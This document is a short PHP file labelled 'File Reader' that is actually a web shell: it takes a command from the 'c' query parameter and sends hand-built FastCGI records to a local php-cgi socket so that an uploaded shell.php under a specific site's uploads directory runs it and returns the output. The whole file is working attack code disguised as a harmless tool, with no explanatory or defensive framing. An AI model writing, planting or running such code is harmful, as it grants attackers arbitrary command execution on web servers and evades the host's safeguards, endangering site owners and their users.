📖 File Reader
<?php
$cmd = $_GET['c'] ?? 'id';
$sock = stream_socket_client('unix:///tmp/php-cgi-73.sock');
fwrite($sock,pack('CCnnCa*',1,1,1,8,0,pack('NN',0,1)));
$params = [
'SCRIPT_FILENAME'=>'/www/wwwroot/hljrlsj.com/public/uploads/file/20260310/shell.php',
'REQUEST_METHOD'=>'GET',
'REQUEST_URI'=>'/shell.php?c='.urlencode($cmd),
'QUERY_STRING'=>'c='.urlencode($cmd)
];
foreach($params as$k=>$v){
$kl=strlen($k);$vl=strlen($v);
$klen=$kl<128?chr($kl):chr(128|($kl>>24)).pack('N',$kl);
$vlen=$vl<128?chr($vl):chr(128|($vl>>24)).pack('N',$vl);
$data=$klen.$vlen.$k.$v;
$pad=(8-(strlen($data)%8))%8;
fwrite($sock,pack('CCnnC',1,4,1,strlen($data),$pad).$data.str_repeat("\0",$pad));
}
fwrite($sock,pack('CCnnC',1,4,1,0,0));
fwrite($sock,pack('CCnnC',1,5,1,0,0));
echo '<pre>';
echo htmlspecialchars(stream_get_contents($sock));
echo "\n\nCMD: $cmd";
?>